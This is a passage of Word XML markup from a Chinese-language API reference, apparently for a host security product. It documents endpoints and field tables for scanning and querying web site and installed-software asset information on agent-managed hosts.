          <w:p w14:paraId="0A197F00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F29D894" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5366545F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绑定地址数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E455542" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C7481A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deployPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C9F0CA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB46D54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40D31E7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>War</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>包部署总</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>目录（仅Linux-Tomcat/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weblogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/JBoss/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Wildfly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/Jetty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7077DDE4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E4B97D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>configName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15ACDBA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2372ACEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01608FC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>仅IIS可用，站点别名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E00C732" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41885A8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2706E02A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD27849" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E5D57DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>仅IIS可用，站点状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0EE4E7A6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EE6CA69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F02B15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B1B817" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF0471D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>仅WINDOWS的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weblogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webshpere</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>\jetty\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wildfly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>使用，站点物理地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E97830C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc115166113"/>
      <w:bookmarkStart w:id="78" w:name="web站点信息扫描"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:t>web站点信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="158B68F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求web站点信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204653C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507B0EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/website/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531BA5E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B86A07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC889F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67610F55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/website/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11962AD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6305A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9DA04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DA5D1"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1E6F1F04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00000000" w:rsidP="00BC669E">
      <w:r>
        <w:pict w14:anchorId="28A903C4">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="280598FF"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56DB6FC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9CB3F7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="054F5184" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EF6E3EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70931D64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49E26048" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B5CE9A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="767CB83B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29B4A659" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="125E6200" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C949289" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc115166114"/>
      <w:bookmarkStart w:id="80" w:name="web站点信息查询扫描状态"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r>
        <w:t>web站点信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="3AC64638" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询web站点信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380B1E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc115166115"/>
      <w:bookmarkStart w:id="82" w:name="软件应用信息"/>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r>
        <w:t>软件应用信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="5B34CEEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F2E078" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的软件应用信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679A1FED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7BA1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>软件应用信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BBD67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE1493" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC8247F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2CCE7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>软件应用信息查询结果；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA6DA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>软件应用信息扫描；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D43C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>软件应用信息查询扫描状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E3E9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F255A56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用软件应用信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570789C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C9C56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46664F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc115166116"/>
      <w:bookmarkStart w:id="84" w:name="软件应用信息查询结果"/>
      <w:r>
        <w:t>软件应用信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="66CFC115" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询软件应用信息，按每台主机每个软件应用进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F4168" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED1981" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/app/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F86B31"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246"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="5221"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D083D1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D34FE10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45035553" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BED1CC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4274FC84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C06BEDB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="601BFC09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CA0C1F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E3DA1EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D79FDB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12EB913A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49D49094" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ABB605E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016CF7DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6D29DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B9B8CC0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="722F14C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133C93F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
